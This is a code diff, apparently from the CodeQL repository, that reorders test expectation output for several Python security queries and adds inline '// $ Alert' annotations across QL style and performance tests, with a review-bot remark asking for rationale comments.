b/python/ql/test/query-tests/Security/CWE-730-RegexInjection/RegexInjection.expected 
@@ -1,7 +1,3 @@ -#select -| re_bad.py:14:15:14:28 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:14:15:14:28 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:14:5:14:33 | ControlFlowNode for Attribute() | re.search | -| re_bad.py:25:35:25:48 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:25:35:25:48 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:26:5:26:31 | ControlFlowNode for Attribute() | re.search | -| re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:37:5:37:41 | ControlFlowNode for Attribute() | re.search | edges | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | | re_bad.py:1:19:1:25 | ControlFlowNode for request | re_bad.py:13:22:13:28 | ControlFlowNode for request | provenance | | 
@@ -26,3 +22,7 @@ nodes | re_bad.py:36:22:36:28 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | semmle.label | ControlFlowNode for unsafe_pattern | subpaths +#select +| re_bad.py:14:15:14:28 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:14:15:14:28 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:14:5:14:33 | ControlFlowNode for Attribute() | re.search | +| re_bad.py:25:35:25:48 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:25:35:25:48 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:26:5:26:31 | ControlFlowNode for Attribute() | re.search | +| re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | re_bad.py:37:16:37:29 | ControlFlowNode for unsafe_pattern | This regular expression depends on a $@ and is executed by $@. | re_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | re_bad.py:37:5:37:41 | ControlFlowNode for Attribute() | re.search | diff --git a/python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.expected b/python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.expected +++ b/python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select 
diff --git a/python/ql/test/query-tests/Security/CWE-798-HardcodedCredentials/HardcodedCredentials.expected b/python/ql/test/query-tests/Security/CWE-798-HardcodedCredentials/HardcodedCredentials.expected index 1774d4a8387c..7fe70dd495b2 100644 --- a/python/ql/test/query-tests/Security/CWE-798-HardcodedCredentials/HardcodedCredentials.expected +++ b/python/ql/test/query-tests/Security/CWE-798-HardcodedCredentials/HardcodedCredentials.expected @@ -1,6 +1,3 @@ -#select -| test.py:5:12:5:24 | ControlFlowNode for StringLiteral | test.py:5:12:5:24 | ControlFlowNode for StringLiteral | test.py:14:18:14:25 | ControlFlowNode for USERNAME | This hardcoded value is $@. | test.py:14:18:14:25 | ControlFlowNode for USERNAME | used as credentials | -| test.py:6:12:6:25 | ControlFlowNode for StringLiteral | test.py:6:12:6:25 | ControlFlowNode for StringLiteral | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | This hardcoded value is $@. | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | used as credentials | edges | test.py:5:1:5:8 | ControlFlowNode for USERNAME | test.py:14:18:14:25 | ControlFlowNode for USERNAME | provenance | | | test.py:5:12:5:24 | ControlFlowNode for StringLiteral | test.py:5:1:5:8 | ControlFlowNode for USERNAME | provenance | | 
@@ -14,3 +11,6 @@ nodes | test.py:14:18:14:25 | ControlFlowNode for USERNAME | semmle.label | ControlFlowNode for USERNAME | | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | semmle.label | ControlFlowNode for PASSWORD | subpaths +#select +| test.py:5:12:5:24 | ControlFlowNode for StringLiteral | test.py:5:12:5:24 | ControlFlowNode for StringLiteral | test.py:14:18:14:25 | ControlFlowNode for USERNAME | This hardcoded value is $@. | test.py:14:18:14:25 | ControlFlowNode for USERNAME | used as credentials | +| test.py:6:12:6:25 | ControlFlowNode for StringLiteral | test.py:6:12:6:25 | ControlFlowNode for StringLiteral | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | This hardcoded value is $@. | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | used as credentials | diff --git a/ql/ql/test/queries/bugs/OrderByConst/Foo.qll b/ql/ql/test/queries/bugs/OrderByConst/Foo.qll index 7229564660ee..9f51572689c1 100644 --- a/ql/ql/test/queries/bugs/OrderByConst/Foo.qll +++ b/ql/ql/test/queries/bugs/OrderByConst/Foo.qll @@ -1,5 +1,5 @@ string foo() { - result = concat(string x | x = [0 .. 10].toString() | x order by x desc, ", ") // BAD + result = concat(string x | x = [0 .. 10].toString() | x order by x desc, ", ") // $ Alert // BAD or result = concat(string x | x = [0 .. 10].toString() | x, ", " order by x desc) // GOOD } diff --git a/ql/ql/test/queries/bugs/OrderByConst/OrderByConst.qlref b/ql/ql/test/queries/bugs/OrderByConst/OrderByConst.qlref index 809589a856f7..9c2263fc14df 100644 --- a/ql/ql/test/queries/bugs/OrderByConst/OrderByConst.qlref +++ b/ql/ql/test/queries/bugs/OrderByConst/OrderByConst.qlref @@ -1 +1,2 @@ -queries/bugs/OrderByConst.ql \ No newline at end of file +query: queries/bugs/OrderByConst.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/bugs/SumWithoutDomain/SumWithoutDomain.qlref b/ql/ql/test/queries/bugs/SumWithoutDomain/SumWithoutDomain.qlref index dc782dfbd0ab..46f2785806e9 100644 
--- a/ql/ql/test/queries/bugs/SumWithoutDomain/SumWithoutDomain.qlref +++ b/ql/ql/test/queries/bugs/SumWithoutDomain/SumWithoutDomain.qlref @@ -1 +1,2 @@ -queries/bugs/SumWithoutDomain.ql \ No newline at end of file +query: queries/bugs/SumWithoutDomain.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/bugs/SumWithoutDomain/Test.qll b/ql/ql/test/queries/bugs/SumWithoutDomain/Test.qll index 8190aed81012..9b15c38d9c6e 100644 --- a/ql/ql/test/queries/bugs/SumWithoutDomain/Test.qll +++ b/ql/ql/test/queries/bugs/SumWithoutDomain/Test.qll @@ -1,6 +1,6 @@ // Result is 3 and not 4 int foo() { - result = sum([1, 1, 2]) // <- Alert here + result = sum([1, 1, 2]) // $ Alert // <- Alert here } // Ok - false negative diff --git a/ql/ql/test/queries/overlay/InlineOverlayCaller/InlineOverlayCaller.qlref b/ql/ql/test/queries/overlay/InlineOverlayCaller/InlineOverlayCaller.qlref index 0347e9eedc54..b3385b469714 100644 --- a/ql/ql/test/queries/overlay/InlineOverlayCaller/InlineOverlayCaller.qlref +++ b/ql/ql/test/queries/overlay/InlineOverlayCaller/InlineOverlayCaller.qlref @@ -1 +1,2 @@ -queries/overlay/InlineOverlayCaller.ql +query: queries/overlay/InlineOverlayCaller.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/overlay/InlineOverlayCaller/Test.qll b/ql/ql/test/queries/overlay/InlineOverlayCaller/Test.qll index e25577d91a17..a3e2f19447a3 100644 --- a/ql/ql/test/queries/overlay/InlineOverlayCaller/Test.qll +++ b/ql/ql/test/queries/overlay/InlineOverlayCaller/Test.qll @@ -4,7 +4,7 @@ module; import ql pragma[inline] -predicate foo(int x) { x = 42 } +predicate foo(int x) { x = 42 } // $ Alert overlay[caller] pragma[inline] diff --git a/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImport.qlref b/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImport.qlref index 4d7907c36ef3..4dc5cc5d490b 100644 
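Review bot: The annotated line in `InlineOverlayCaller/Test.qll` carries a bare `// $ Alert` with no rationale, unlike the sibling tests in this patch that keep a `// BAD` or `// NOT OK` remark next to the new tag. A reader cannot tell from the hunk why `foo` is expected to be flagged. Presumably it is because `foo` is `pragma[inline]` without the `overlay[caller]` annotation that the following predicate has. I would write `predicate foo(int x) { x = 42 } // $ Alert // BAD: pragma[inline] without overlay[caller]`, after confirming that against the query. The same applies to `abstract class Base extends AstNode { } // $ Alert` in `AbstractClassImportTest1.qll`.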
--- a/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImport.qlref +++ b/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImport.qlref @@ -1 +1,2 @@ -queries/performance/AbstractClassImport.ql \ No newline at end of file +query: queries/performance/AbstractClassImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImportTest1.qll b/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImportTest1.qll index ce7f7c4ea688..fe2519cc0d56 100644 --- a/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImportTest1.qll +++ b/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImportTest1.qll @@ -1,4 +1,4 @@ import ql import AbstractClassImportTest2 -abstract class Base extends AstNode { } +abstract class Base extends AstNode { } // $ Alert diff --git a/ql/ql/test/queries/performance/MissingNoInline/MissingNoInline.qlref b/ql/ql/test/queries/performance/MissingNoInline/MissingNoInline.qlref index aee3346d730d..f1bc931e122b 100644 --- a/ql/ql/test/queries/performance/MissingNoInline/MissingNoInline.qlref +++ b/ql/ql/test/queries/performance/MissingNoInline/MissingNoInline.qlref @@ -1 +1,2 @@ -queries/performance/MissingNoinline.ql \ No newline at end of file +query: queries/performance/MissingNoinline.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/performance/MissingNoInline/Test.qll b/ql/ql/test/queries/performance/MissingNoInline/Test.qll index a55315be7e20..a92f7f38d0cc 100644 --- a/ql/ql/test/queries/performance/MissingNoInline/Test.qll +++ b/ql/ql/test/queries/performance/MissingNoInline/Test.qll @@ -5,7 +5,7 @@ import ql * * This predicate exists to fix a join order. */ -predicate missingNoInline(AddExpr add, Expr e1, Expr e2) { +predicate missingNoInline(AddExpr add, Expr e1, Expr e2) { // $ Alert // BAD add.getLeftOperand() = e1 and add.getRightOperand() = e2 
diff --git a/ql/ql/test/queries/performance/VarUnusedInDisjunct/Test.qll b/ql/ql/test/queries/performance/VarUnusedInDisjunct/Test.qll index 10e97e582096..b4b30f100286 100644 --- a/ql/ql/test/queries/performance/VarUnusedInDisjunct/Test.qll +++ b/ql/ql/test/queries/performance/VarUnusedInDisjunct/Test.qll @@ -13,21 +13,21 @@ class MyStr extends string { predicate bad1(Big b) { b.toString().matches("%foo") or - any() + any() // $ Alert } int bad2() { exists(Big big, Small small | result = big.toString().toInt() or - result = small.toString().toInt() + result = small.toString().toInt() // $ Alert ) } float bad3(Big t) { result = [1 .. 10].toString().toFloat() or result = [11 .. 20].toString().toFloat() or - result = t.toString().toFloat() or + result = t.toString().toFloat() or // $ Alert result = [21 .. 30].toString().toFloat() } @@ -50,7 +50,7 @@ predicate bad4(Big fromType, Big toType) { or fromType.toString().matches("%foo") or - helper(toType, fromType) + helper(toType, fromType) // $ Alert } predicate good2(Big t) { @@ -71,7 +71,7 @@ predicate mixed1(Big good, Small small) { small.toString().matches("%foo") and // the use of good is fine, the comparison further up binds it. // the same is not true for bad. - (bad.toString().matches("%foo") or good.toString().regexpMatch("foo.*")) and + (bad.toString().matches("%foo") or good.toString().regexpMatch("foo.*")) and // $ Alert small.toString().regexpMatch(".*foo") ) } @@ -112,7 +112,7 @@ predicate good5(Big bb, Big v, boolean certain) { ) } -predicate bad5(Big bb) { if none() then bb.toString().matches("%foo") else any() } +predicate bad5(Big bb) { if none() then bb.toString().matches("%foo") else any() } // $ Alert pragma[inline] predicate good5(Big a, Big b) { @@ -126,12 +126,12 @@ predicate bad6(Big a) { ( a.toString().matches("%foo") // bad or - any() + any() // $ Alert ) and ( a.toString().matches("%foo") // also bad or - any() + any() // $ Alert ) } 
@@ -163,7 +163,7 @@ class HasField extends Big { HasField() { field = this or - this.toString().matches("%foo") // <- field only defined here. + this.toString().matches("%foo") // $ Alert // <- field only defined here. } Big getField() { result = field } diff --git a/ql/ql/test/queries/performance/VarUnusedInDisjunct/VarUnusedInDisjunct.qlref b/ql/ql/test/queries/performance/VarUnusedInDisjunct/VarUnusedInDisjunct.qlref index 28f0c0d938a1..0413e31942f1 100644 --- a/ql/ql/test/queries/performance/VarUnusedInDisjunct/VarUnusedInDisjunct.qlref +++ b/ql/ql/test/queries/performance/VarUnusedInDisjunct/VarUnusedInDisjunct.qlref @@ -1 +1,2 @@ -queries/performance/VarUnusedInDisjunct.ql \ No newline at end of file +query: queries/performance/VarUnusedInDisjunct.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/AcronymsShouldBeCamelCase.qlref b/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/AcronymsShouldBeCamelCase.qlref index 0f57f1fa66c7..3e287c27a394 100644 --- a/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/AcronymsShouldBeCamelCase.qlref +++ b/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/AcronymsShouldBeCamelCase.qlref @@ -1 +1,2 @@ -queries/style/AcronymsShouldBeCamelCase.ql \ No newline at end of file +query: queries/style/AcronymsShouldBeCamelCase.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/Test.qll b/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/Test.qll index 1ff0d4c0d52f..06742e069485 100644 --- a/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/Test.qll +++ b/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/Test.qll 
@@ -1,13 +1,13 @@ // BAD -predicate isXML() { any() } +predicate isXML() { any() } // $ Alert // GOOD [ AES is exceptional ] predicate isAES() { any() } // BAD -newtype TXMLElements = +newtype TXMLElements = // $ Alert TXmlElement() or // GOOD - TXMLElement() // BAD + TXMLElement() // $ Alert // BAD // GOOD newtype TIRFunction = MkIRFunction() diff --git a/ql/ql/test/queries/style/CouldBeCast/CouldBeCast.qlref b/ql/ql/test/queries/style/CouldBeCast/CouldBeCast.qlref index 78879bb0ab03..36a6244669b8 100644 --- a/ql/ql/test/queries/style/CouldBeCast/CouldBeCast.qlref +++ b/ql/ql/test/queries/style/CouldBeCast/CouldBeCast.qlref @@ -1 +1,2 @@ -queries/style/CouldBeCast.ql \ No newline at end of file +query: queries/style/CouldBeCast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/CouldBeCast/Foo.qll b/ql/ql/test/queries/style/CouldBeCast/Foo.qll index 5f6771f00437..6c3da185fe6f 100644 --- a/ql/ql/test/queries/style/CouldBeCast/Foo.qll +++ b/ql/ql/test/queries/style/CouldBeCast/Foo.qll @@ -1,20 +1,20 @@ bindingset[i] predicate foo(int i) { - exists(Even j | j = i) // NOT OK + exists(Even j | j = i) // $ Alert // NOT OK or exists(Even j | j = i | j % 4 = 0) // OK or - any(Even j | j = i) = 2 // NOT OK + any(Even j | j = i) = 2 // $ Alert // NOT OK or - any(Even j | j = i | j) = 2 // NOT OK + any(Even j | j = i | j) = 2 // $ Alert // NOT OK or any(Even j | j = i | j * 2) = 4 // OK or any(Even j | j = i and j % 4 = 0 | j) = 4 // OK or - any(int j | j = i) = 2 // NOT OK + any(int j | j = i) = 2 // $ Alert // NOT OK or - exists(int j | j = i) // NOT OK + exists(int j | j = i) // $ Alert // NOT OK } class Even extends int { diff --git a/ql/ql/test/queries/style/DataFlowConfigModuleNaming/DataFlowConfigModuleNaming.qlref b/ql/ql/test/queries/style/DataFlowConfigModuleNaming/DataFlowConfigModuleNaming.qlref index 62375818f5ea..2025f1cdb902 100644 
--- a/ql/ql/test/queries/style/DataFlowConfigModuleNaming/DataFlowConfigModuleNaming.qlref +++ b/ql/ql/test/queries/style/DataFlowConfigModuleNaming/DataFlowConfigModuleNaming.qlref @@ -1 +1,2 @@ -queries/style/DataFlowConfigModuleNaming.ql \ No newline at end of file +query: queries/style/DataFlowConfigModuleNaming.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/DataFlowConfigModuleNaming/Test.qll b/ql/ql/test/queries/style/DataFlowConfigModuleNaming/Test.qll index a06118a7fe0a..6da96a4b572d 100644 --- a/ql/ql/test/queries/style/DataFlowConfigModuleNaming/Test.qll +++ b/ql/ql/test/queries/style/DataFlowConfigModuleNaming/Test.qll @@ -8,14 +8,14 @@ module EmptyConfig implements DataFlow::ConfigSig { } // BAD - does not end with "Config" -module EmptyConfiguration implements DataFlow::ConfigSig { +module EmptyConfiguration implements DataFlow::ConfigSig { // $ Alert predicate isSource(DataFlow::Node src) { none() } predicate isSink(DataFlow::Node sink) { none() } } // BAD - does not end with "Config" -module EmptyFlow implements DataFlow::ConfigSig { +module EmptyFlow implements DataFlow::ConfigSig { // $ Alert predicate isSource(DataFlow::Node src) { none() } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/ql/test/queries/style/DeadCode/DeadCode.qlref b/ql/ql/test/queries/style/DeadCode/DeadCode.qlref index ac615af49617..704cc5c1365e 100644 --- a/ql/ql/test/queries/style/DeadCode/DeadCode.qlref +++ b/ql/ql/test/queries/style/DeadCode/DeadCode.qlref @@ -1 +1,2 @@ -queries/style/DeadCode.ql \ No newline at end of file +query: queries/style/DeadCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/DeadCode/Foo.qll b/ql/ql/test/queries/style/DeadCode/Foo.qll index a5b5b08e2a4a..32fab335b780 100644 --- a/ql/ql/test/queries/style/DeadCode/Foo.qll +++ b/ql/ql/test/queries/style/DeadCode/Foo.qll 
@@ -1,11 +1,11 @@ import ql private module Mixed { - private predicate dead1() { none() } + private predicate dead1() { none() } // $ Alert predicate alive1() { none() } - predicate dead2() { none() } + predicate dead2() { none() } // $ Alert } predicate usesAlive() { Mixed::alive1() } @@ -43,7 +43,7 @@ private module Input1 implements InputSig { predicate foo() { any() } } -private module Input2 implements InputSig { +private module Input2 implements InputSig { // $ Alert predicate foo() { any() } } @@ -53,7 +53,7 @@ private module Input3 implements InputSig { module M1 = ParameterizedModule; -private module M2 = ParameterizedModule; +private module M2 = ParameterizedModule; // $ Alert import ParameterizedModule @@ -65,7 +65,7 @@ private class CImpl1 extends AstNode { } final class CPublic1 = CImpl1; -private class CImpl2 extends AstNode { } +private class CImpl2 extends AstNode { } // $ Alert overlay[discard_entity] private predicate discard(@foo x) { any() } diff --git a/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qll b/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qll index edfc8b4576e9..4f1d5da7196b 100644 --- a/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qll +++ b/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qll @@ -1,5 +1,5 @@ class C1 extends int { - int field; // BAD + int field; // $ Alert // BAD C1() { this = field and diff --git a/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qlref b/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qlref index 0e77c6ae6fe2..cf83276fb00e 100644 --- a/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qlref +++ b/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qlref 
@@ -1 +1,2 @@ -queries/style/FieldOnlyUsedInCharPred.ql +query: queries/style/FieldOnlyUsedInCharPred.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/ImplicitThis/Bad.qll b/ql/ql/test/queries/style/ImplicitThis/Bad.qll index 97b51284acc5..c1834c8bb6b7 100644 --- a/ql/ql/test/queries/style/ImplicitThis/Bad.qll +++ b/ql/ql/test/queries/style/ImplicitThis/Bad.qll @@ -7,5 +7,5 @@ class Foo extends string { string getBarWithThis() { result = this.getBar() } - string getBarWithoutThis() { result = getBar() } + string getBarWithoutThis() { result = getBar() } // $ Alert } diff --git a/ql/ql/test/queries/style/ImplicitThis/Bad2.qll b/ql/ql/test/queries/style/ImplicitThis/Bad2.qll index 27d7485ca4f9..540c02f09216 100644 --- a/ql/ql/test/queries/style/ImplicitThis/Bad2.qll +++ b/ql/ql/test/queries/style/ImplicitThis/Bad2.qll @@ -5,5 +5,5 @@ class Foo extends string { string getBar() { result = "bar" } - string getBarWithoutThis() { result = getBar() } + string getBarWithoutThis() { result = getBar() } // $ Alert } diff --git a/ql/ql/test/queries/style/ImplicitThis/ImplicitThis.qlref b/ql/ql/test/queries/style/ImplicitThis/ImplicitThis.qlref index 0bdcd3b4b5b0..f751b15e8146 100644 --- a/ql/ql/test/queries/style/ImplicitThis/ImplicitThis.qlref +++ b/ql/ql/test/queries/style/ImplicitThis/ImplicitThis.qlref @@ -1 +1,2 @@ -queries/style/ImplicitThis.ql +query: queries/style/ImplicitThis.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/MissingParameterInQlDoc/Foo.qll b/ql/ql/test/queries/style/MissingParameterInQlDoc/Foo.qll index 13509dbe5218..ffd21d59a5c9 100644 --- a/ql/ql/test/queries/style/MissingParameterInQlDoc/Foo.qll +++ b/ql/ql/test/queries/style/MissingParameterInQlDoc/Foo.qll 
@@ -2,7 +2,7 @@ predicate test1(int param1, int param2, int param3) { none() } // OK /** `param1`, `par2` */ -predicate test2(int param1, int param2) { none() } // NOT OK - `par2` is not a parameter, and `param2` has no documentation +predicate test2(int param1, int param2) { none() } // $ Alert // NOT OK - `par2` is not a parameter, and `param2` has no documentation /** `param1`, `par2 + par3` */ predicate test3(int param1, int par2, int par3) { none() } // OK @@ -11,4 +11,4 @@ predicate test3(int param1, int par2, int par3) { none() } // OK predicate test4(int param1, int param2) { none() } // OK - the QLDoc mentions none of the parameters, that's OK /** the param1 parameter is mentioned in a non-code block, but the `par2` parameter is misspelled */ -predicate test5(int param1, int param2) { none() } // NOT OK - the `param1` parameter is "documented" in clear text, but `par2` is misspelled +predicate test5(int param1, int param2) { none() } // $ Alert // NOT OK - the `param1` parameter is "documented" in clear text, but `par2` is misspelled diff --git a/ql/ql/test/queries/style/MissingParameterInQlDoc/MissingParameterInQlDoc.qlref b/ql/ql/test/queries/style/MissingParameterInQlDoc/MissingParameterInQlDoc.qlref index 0539e4f5de2d..a7d2f3d0a1d9 100644 --- a/ql/ql/test/queries/style/MissingParameterInQlDoc/MissingParameterInQlDoc.qlref +++ b/ql/ql/test/queries/style/MissingParameterInQlDoc/MissingParameterInQlDoc.qlref @@ -1 +1,2 @@ -queries/style/MissingParameterInQlDoc.ql \ No newline at end of file +query: queries/style/MissingParameterInQlDoc.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/MissingQualityMetadata.qlref b/ql/ql/test/queries/style/MissingQualityMetadata/MissingQualityMetadata.qlref index 6d7eb26bedeb..48abe277264b 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/MissingQualityMetadata.qlref 
+++ b/ql/ql/test/queries/style/MissingQualityMetadata/MissingQualityMetadata.qlref @@ -1 +1,2 @@ -queries/style/MissingQualityMetadata.ql +query: queries/style/MissingQualityMetadata.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMaintainabilityWrongToplevel.ql b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMaintainabilityWrongToplevel.ql index 3dd18771f959..0b1290de98b2 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMaintainabilityWrongToplevel.ql +++ b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMaintainabilityWrongToplevel.ql @@ -8,7 +8,7 @@ * @tags quality * maintainability * error-handling - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMultipleTopLevel.ql b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMultipleTopLevel.ql index a9a7b48b76c7..4624b6d1076e 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMultipleTopLevel.ql +++ b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMultipleTopLevel.ql @@ -8,7 +8,7 @@ * @tags quality * maintainability * reliability - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityNoToplevel.ql b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityNoToplevel.ql index ad2ab5c1fb57..8c8bda6294e5 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityNoToplevel.ql +++ b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityNoToplevel.ql @@ -7,7 +7,7 @@ * @id ql/quality-query-test * @tags quality * someothertag - */ + */ // $ Alert import ql 
diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityReliabilityWrongToplevel.ql b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityReliabilityWrongToplevel.ql index 53e84fb8a196..1a33baf6c516 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityReliabilityWrongToplevel.ql +++ b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityReliabilityWrongToplevel.ql @@ -8,7 +8,7 @@ * @tags quality * reliability * readability - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/MissingSecurityMetadata/MissingSecurityMetadata.qlref b/ql/ql/test/queries/style/MissingSecurityMetadata/MissingSecurityMetadata.qlref index c697bcee82eb..bd4295a68621 100644 --- a/ql/ql/test/queries/style/MissingSecurityMetadata/MissingSecurityMetadata.qlref +++ b/ql/ql/test/queries/style/MissingSecurityMetadata/MissingSecurityMetadata.qlref @@ -1 +1,2 @@ -queries/style/MissingSecurityMetadata.ql \ No newline at end of file +query: queries/style/MissingSecurityMetadata.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSecurity.ql b/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSecurity.ql index d05628798311..a403812021e5 100644 --- a/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSecurity.ql +++ b/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSecurity.ql @@ -7,7 +7,7 @@ * @precision very-high * @id ql/some-query * @tags quality - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSeverity.ql b/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSeverity.ql index f04fe81599ab..47a12a1858a3 100644 --- a/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSeverity.ql +++ b/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSeverity.ql 
@@ -7,7 +7,7 @@ * @id ql/some-query * @tags quality * security - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/Misspelling/Misspelling.qlref b/ql/ql/test/queries/style/Misspelling/Misspelling.qlref index afbcaf951f3e..ed9785fee3a7 100644 --- a/ql/ql/test/queries/style/Misspelling/Misspelling.qlref +++ b/ql/ql/test/queries/style/Misspelling/Misspelling.qlref @@ -1 +1,2 @@ -queries/style/Misspelling.ql \ No newline at end of file +query: queries/style/Misspelling.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/Misspelling/Test.qll b/ql/ql/test/queries/style/Misspelling/Test.qll index b6619145f8d5..1da75babe072 100644 --- a/ql/ql/test/queries/style/Misspelling/Test.qll +++ b/ql/ql/test/queries/style/Misspelling/Test.qll @@ -1,13 +1,13 @@ /** * A string that's deliberately mispelled (and so is that last word). - */ -class PublicallyAccessible extends string { - int numOccurences; // should be 'occurrences' + */ // $ Alert +class PublicallyAccessible extends string { // $ Alert + int numOccurences; // $ Alert // should be 'occurrences' PublicallyAccessible() { this = "publically" and numOccurences = 123 } // should be argument - predicate hasAgrument() { none() } + predicate hasAgrument() { none() } // $ Alert int getNum() { result = numOccurences } } @@ -15,8 +15,8 @@ class PublicallyAccessible extends string { /** * A class whose name contains a British-English spelling. * And here's the word 'colour'. - */ -class AnalysedInt extends int { + */ // $ Alert 